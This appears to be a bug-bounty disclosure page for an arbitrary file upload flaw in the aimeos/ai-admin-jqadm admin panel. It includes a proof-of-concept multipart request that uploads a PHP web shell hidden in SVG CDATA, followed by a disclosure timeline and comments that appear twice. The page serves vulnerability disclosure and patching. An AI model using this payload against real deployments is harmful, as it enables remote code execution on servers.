We've joined Protect AIJoin us over there for bounties up to $50,000+ for vulnerabilities in AI/ML repos

/

Arbitrary file upload in aimeos/ai-admin-jqadm

Valid

Reported on

Aug 14th 2023

Description

Due to lack of file extension validation, privileged user (administrator) can upload arbitrary files with "update logo" and "update icon" features. The application uses the extension provided in the filename parameter.

Proof of Concept

POST /admin/default/jqadm/save/settings?locale=en HTTP/1.1
...
------WebKitFormBoundaryAG74QWXOFzNc5cbH
Content-Disposition: form-data; name="media[logo]"; filename="test.php"
Content-Type: image/svg+xml

<svg>
  /* <![CDATA[ */
    <?php system($_GET['c']);
?>
 /* ]]> */
</svg>
...

A request crafted this way will lead to "logo.php" file being created.

Impact

This leads to Remote Code Execution in versions using vulnerable "enshrined/svg-sanitize" library for sanitization (deployments that didn't upgrade since 2022.10.13). In newer versions there isn't any significant impact. But the arbitrary file upload part is still there in versions prior to 2023.07.3 that could be used as part of more complex exploit chain if additional vulnerabilities are discovered.

Occurrences

Standard.php L317

Standard.php L359

References

Original report (to the wrong repository)

We are processing your report and will contact the aimeos/ai-admin-jqadm team within 24 hours. a month ago

We have contacted a member of the aimeos/ai-admin-jqadm team and are waiting to hear back a month ago

Aimeos validated this vulnerability a month ago

Stan has been awarded the disclosure bounty

The fix bounty is now up for grabs

The researcher's credibility has increased: +7

Aimeos marked this as fixed in 2022.10.13 with commit bfd722 a month ago

Aimeos has been awarded the fix bounty

This vulnerability will not receive a CVE

Aimeos published this vulnerability a month ago

Standard.php#L317 has been validated

Standard.php#L359 has been validated

commented a month ago

how to build

commented a month ago

Researcher

Any chance of registering a CVE for this? We've discussed it in the original report, but maybe you've changed your mind

to join this conversation

We are processing your report and will contact the aimeos/ai-admin-jqadm team within 24 hours. a month ago

We have contacted a member of the aimeos/ai-admin-jqadm team and are waiting to hear back a month ago

Aimeos validated this vulnerability a month ago

Stan has been awarded the disclosure bounty

The fix bounty is now up for grabs

The researcher's credibility has increased: +7

Aimeos marked this as fixed in 2022.10.13 with commit bfd722 a month ago

Aimeos has been awarded the fix bounty

This vulnerability will not receive a CVE

Aimeos published this vulnerability a month ago

Standard.php#L317 has been validated

Standard.php#L359 has been validated

commented a month ago

how to build

commented a month ago

Researcher

Any chance of registering a CVE for this? We've discussed it in the original report, but maybe you've changed your mind

to join this conversation